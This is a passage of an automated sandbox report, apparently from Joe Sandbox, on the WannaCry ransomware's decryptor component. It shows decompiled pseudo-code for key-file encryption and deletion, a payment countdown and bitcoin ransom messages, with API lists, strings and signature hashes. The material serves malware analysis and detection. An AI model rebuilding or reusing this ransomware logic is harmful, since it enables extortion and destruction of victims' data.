                                                      								 *(_t154 + 0xa8) = 0xffffffff;
                                                      							}
                                                      						} else {
                                                      							 *(_t154 + 0xa8) = 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = _t157;
                                                      					}
                                                      				} else {
                                                      					E00404640( &_v2508);
                                                      					_v4 = 0;
                                                      					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                                      						_t97 = DeleteFileA( &_v2540);
                                                      						_v4 = _t157;
                                                      						E00404690(_t97,  &_v2508);
                                                      						goto L4;
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = 2;
                                                      						_v4 = _t157;
                                                      						_t123 =  &_v2508;
                                                      						L15:
                                                      						_t83 = E00404690(_t94, _t123);
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t83;
                                                      			}

                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
                                                      				intOrPtr _t89;
                                                      				char _t90;
                                                      				intOrPtr _t91;
                                                      				signed int _t94;
                                                      				intOrPtr _t98;
                                                      				signed int _t99;
                                                      				intOrPtr _t125;
                                                      				signed int _t133;
                                                      				void* _t136;
                                                      				intOrPtr _t139;
                                                      				signed int _t143;
                                                      				signed int _t147;
                                                      				void* _t148;
                                                      				intOrPtr _t161;
                                                      				signed int _t192;
                                                      				intOrPtr _t193;
                                                      				signed int _t196;
                                                      				signed int _t197;
                                                      				signed int _t198;
                                                      				intOrPtr _t200;
                                                      				intOrPtr _t202;
                                                      				void* _t204;
                                                      				intOrPtr _t206;
                                                      				void* _t207;
                                                      				void* _t208;
                                                      				void* _t209;
                                                      				void* _t210;
                                                      				void* _t211;
                                                      				void* _t213;
                                                      				long long _t225;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413EBB);
                                                      				_t89 =  *[fs:0x0];
                                                      				_push(_t89);
                                                      				 *[fs:0x0] = _t206;
                                                      				_t207 = _t206 - 0x8c;
                                                      				_t196 = 0;
                                                      				_t136 = __ecx;
                                                      				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                                      				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                                      				 *(_t207 + 0x1c) = 0;
                                                      				 *(_t207 + 0x20) = 0;
                                                      				_t204 = 0;
                                                      				L2:
                                                      				__imp__time(_t196);
                                                      				_t139 = M00421120; // 0x30303b30
                                                      				_t161 = _t89;
                                                      				_t90 = "00;00;00;00"; // 0x303b3030
                                                      				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                                      				 *(_t207 + 0x3c) = _t90;
                                                      				_t91 =  *0x421124; // 0x30303b
                                                      				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                                      				_t208 = _t207 + 4;
                                                      				 *(_t208 + 0x24) = _t196;
                                                      				memset(_t208 + 0x44, 0, 0x16 << 2);
                                                      				_t209 = _t208 + 0xc;
                                                      				if(_t204 != 0) {
                                                      					_t94 =  *(_t136 + 0x580);
                                                      				} else {
                                                      					_t94 =  *(_t136 + 0x57c);
                                                      				}
                                                      				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                                      				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                                      				if(_t161 <= _t98) {
                                                      					_t99 =  *(_t209 + 0x24);
                                                      				} else {
                                                      					_t133 = _t98 - _t161 + _t143;
                                                      					_t196 = _t133;
                                                      					if(_t196 <= 0) {
                                                      						_t99 =  *(_t209 + 0x24);
                                                      					} else {
                                                      						asm("cdq");
                                                      						_t99 = _t133 * 0x64 / _t143;
                                                      					}
                                                      					if(_t196 < 0) {
                                                      						_t196 = 0;
                                                      					}
                                                      				}
                                                      				if(_t204 != 0) {
                                                      					 *(_t209 + 0x20) = _t99;
                                                      				} else {
                                                      					 *(_t209 + 0x14) = _t196;
                                                      					 *(_t209 + 0x1c) = _t99;
                                                      				}
                                                      				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                                      				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                                      				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                                      				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                                      				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                                      				_t198 = _t197 + _t192 * 0xfffff1f0;
                                                      				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                                      				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                                      				_t207 = _t209 + 0x18;
                                                      				if(_t204 != 0) {
                                                      					_t148 = _t136 + 0x444;
                                                      					_push(_t207 + 0x38);
                                                      				} else {
                                                      					_push(_t207 + 0x38);
                                                      					_t148 = _t136 + 0x3c8;
                                                      				}
                                                      				_t89 = E00405180(_t148);
                                                      				_t204 = _t204 + 1;
                                                      				if(_t204 < 2) {
                                                      					_t196 = 0;
                                                      					goto L2;
                                                      				}
                                                      				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
                                                      				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
                                                      				L00412DA6();
                                                      				 *(_t207 + 0xa4) = 0;
                                                      				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                                      				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                                      					_t225 = _t225 + st0;
                                                      					 *(_t136 + 0x818) = 1;
                                                      				}
                                                      				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                                      				if(_t124 != 0) {
                                                      					 *((long long*)(_t207 + 0x14)) = _t225;
                                                      					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                                      					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_t124 = _t136 + 0x81c;
                                                      					_push("%.1f BTC");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t210 = _t207 + 0x10;
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_push("Send %.1f BTC to this address:");
                                                      					_push(_t210 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t210 + 0x10;
                                                      				} else {
                                                      					L0041304A();
                                                      					_t202 = _t124;
                                                      					_push(_t202);
                                                      					_push("$%d");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t213 = _t207 + 0xc;
                                                      					_push(_t202);
                                                      					_push("Send $%d worth of bitcoin to this address:");
                                                      					_push(_t213 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t213 + 0xc;
                                                      				}
                                                      				_push( *((intOrPtr*)(_t211 + 0x10)));
                                                      				_push(0x402);
                                                      				L00412CE6();
                                                      				L00412CE0();
                                                      				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                                      				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                                      				if(_t125 != 0x121284) {
                                                      					E004079C0(_t136);
                                                      					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                                      					if(_t125 != 0) {
                                                      						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                                      				return _t125;
                                                      			}
                                                      0x00000000
                                                      0x004076d7
                                                      0x0040785b
                                                      0x00407870
                                                      0x00407876
                                                      0x0040787f
                                                      0x0040788a
                                                      0x00407892
                                                      0x00407894
                                                      0x00407896
                                                      0x00407896
                                                      0x004078a0
                                                      0x004078a8
                                                      0x004078db
                                                      0x004078df
                                                      0x004078e3
                                                      0x004078e7
                                                      0x004078e8
                                                      0x004078e9
                                                      0x004078ef
                                                      0x004078f4
                                                      0x004078f5
                                                      0x004078fa
                                                      0x00407901
                                                      0x00407902
                                                      0x00407903
                                                      0x00407908
                                                      0x00407909
                                                      0x0040790e
                                                      0x004078aa
                                                      0x004078aa
                                                      0x004078af
                                                      0x004078b7
                                                      0x004078b8
                                                      0x004078bd
                                                      0x004078be
                                                      0x004078c3
                                                      0x004078ca
                                                      0x004078cb
                                                      0x004078d0
                                                      0x004078d1
                                                      0x004078d6
                                                      0x004078d6
                                                      0x00407917
                                                      0x00407918
                                                      0x0040791d
                                                      0x00407924
                                                      0x00407929
                                                      0x0040792f
                                                      0x0040793e
                                                      0x00407942
                                                      0x00407947
                                                      0x00407950
                                                      0x0040795a
                                                      0x0040796c
                                                      0x00407973
                                                      0x00407984
                                                      0x0040798b
                                                      0x0040798b
                                                      0x00407950
                                                      0x00407994
                                                      0x0040799f
                                                      0x004079af
                                                      0x004079bc

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				void* _t86;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr* _t122;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr* _t124;
                                                      				intOrPtr* _t125;
                                                      				intOrPtr* _t126;
                                                      				intOrPtr* _t127;
                                                      				intOrPtr _t132;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413C65);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t132;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t121 = __ecx + 0x890;
                                                      				_v16 = _t121;
                                                      				 *_t121 = 0x415c00;
                                                      				_v4 = 0x1d;
                                                      				L00412D52();
                                                      				 *_t121 = 0x415bec;
                                                      				_t122 = __ecx + 0x888;
                                                      				_v16 = _t122;
                                                      				 *_t122 = 0x415c00;
                                                      				_v4 = 0x1e;
                                                      				L00412D52();
                                                      				 *_t122 = 0x415bec;
                                                      				_t123 = __ecx + 0x880;
                                                      				_v16 = _t123;
                                                      				 *_t123 = 0x415c00;
                                                      				_v4 = 0x1f;
                                                      				L00412D52();
                                                      				 *_t123 = 0x415bec;
                                                      				_t124 = __ecx + 0x878;
                                                      				_v16 = _t124;
                                                      				 *_t124 = 0x415c00;
                                                      				_v4 = 0x20;
                                                      				L00412D52();
                                                      				 *_t124 = 0x415bec;
                                                      				_v4 = 0x18;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x870);
                                                      				_v4 = 0x17;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x868);
                                                      				_v4 = 0x16;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x860);
                                                      				_v4 = 0x15;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x858);
                                                      				_t125 = __ecx + 0x850;
                                                      				_v16 = _t125;
                                                      				 *_t125 = 0x415c00;
                                                      				_v4 = 0x21;
                                                      				L00412D52();
                                                      				 *_t125 = 0x415bec;
                                                      				_v4 = 0x13;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x848);
                                                      				_v4 = 0x12;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x840);
                                                      				_v4 = 0x11;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x838);
                                                      				_t126 = __ecx + 0x830;
                                                      				_v16 = _t126;
                                                      				 *_t126 = 0x415c00;
                                                      				_v4 = 0x22;
                                                      				L00412D52();
                                                      				 *_t126 = 0x415bec;
                                                      				_v4 = 0xf;
                                                      				L00412CC2();
                                                      				_v4 = 0xe;
                                                      				L00412CC2();
                                                      				_v4 = 0xd;
                                                      				L00412CC2();
                                                      				_v4 = 0xc;
                                                      				L00412CC2();
                                                      				_v4 = 0xb;
                                                      				L00412EF6();
                                                      				_v4 = 0xa;
                                                      				E004050A0(__ecx + 0x444);
                                                      				_v4 = 9;
                                                      				E004050A0(__ecx + 0x3c8);
                                                      				_v4 = 8;
                                                      				E00404170(__ecx + 0x360);
                                                      				_v4 = 7;
                                                      				E00404170(__ecx + 0x2f8);
                                                      				_v4 = 6;
                                                      				E00404170(__ecx + 0x290);
                                                      				_v4 = 5;
                                                      				E00404170(__ecx + 0x228);
                                                      				_t127 = __ecx + 0x1a4;
                                                      				_v16 = _t127;
                                                      				 *_t127 = 0x4161a4;
                                                      				_v4 = 0x23;
                                                      				L00412F0E();
                                                      				_v4 = 4;
                                                      				L00412C9E();
                                                      				_v4 = 3;
                                                      				_t86 = E00405D90(__ecx + 0x120);
                                                      				_v4 = 2;
                                                      				L00412EF0();
                                                      				_v4 = 1;
                                                      				L00412EF0();
                                                      				_v4 = 0;
                                                      				L00412D4C();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t86;
                                                      			}

















                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
                                                      				intOrPtr _t16;
                                                      				long _t17;
                                                      				struct HFONT__* _t19;
                                                      				long _t20;
                                                      				long _t21;
                                                      				long _t23;
                                                      				int _t35;
                                                      				int _t38;
                                                      				int _t40;
                                                      				int _t47;
                                                      				intOrPtr _t48;
                                                      
                                                      				_t48 = __ecx;
                                                      				L00412CB0();
                                                      				_t16 =  *0x42189c; // 0x0
                                                      				_t17 =  *(_t16 + 0x824);
                                                      				 *(__ecx + 0xe8) = _t17;
                                                      				_push(CreateSolidBrush(_t17));
                                                      				L00412D5E();
                                                      				_t47 = __ecx + 0xec;
                                                      				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t19);
                                                      				L00412D5E();
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t35 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t35 = 0;
                                                      				}
                                                      				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                                      				_push(0x409);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t38 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t38 = 0;
                                                      				}
                                                      				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t40 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t40 = 0;
                                                      				}
                                                      				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                                      				_push(0x40e);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t47 =  *(_t47 + 4);
                                                      				}
                                                      				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                                      				E00403CB0(_t48);
                                                      				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                                      				_push(0xffffffff);
                                                      				_push(0xffffffff);
                                                      				_push(0);
                                                      				_push("Path");
                                                      				_push(0);
                                                      				L00412D58();
                                                      				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                                      				 *0x4217bc = _t48;
                                                      				return 1;
                                                      			}















                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
                                                      				char _v4;
                                                      				char _v12;
                                                      				char _v24;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				void* _v280;
                                                      				char _v284;
                                                      				char _v288;
                                                      				char _v292;
                                                      				void* _v296;
                                                      				char _v300;
                                                      				intOrPtr _v304;
                                                      				char _v308;
                                                      				void* _v312;
                                                      				void* _v316;
                                                      				char** _t26;
                                                      				long _t30;
                                                      				void* _t31;
                                                      				char** _t32;
                                                      				void* _t56;
                                                      				intOrPtr _t58;
                                                      				void* _t60;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E61);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_t56 = __ecx;
                                                      				L00412DA6();
                                                      				_t26 =  &_v284;
                                                      				_push(_t26);
                                                      				_v4 = 0;
                                                      				L00412DD6();
                                                      				_push("msg\\");
                                                      				L00412CAA();
                                                      				_push("m_%s.wnry");
                                                      				_push(_t26);
                                                      				_push( &_v288);
                                                      				_v12 = 1;
                                                      				L00412CCE();
                                                      				sprintf( &_v292,  *_t26, _v304);
                                                      				_t60 = _t58 - 0x110 + 0xc;
                                                      				L00412CC2();
                                                      				_v24 = 0;
                                                      				L00412CC2();
                                                      				_t30 = GetFileAttributesA( &_v292);
                                                      				if(_t30 == 0xffffffff) {
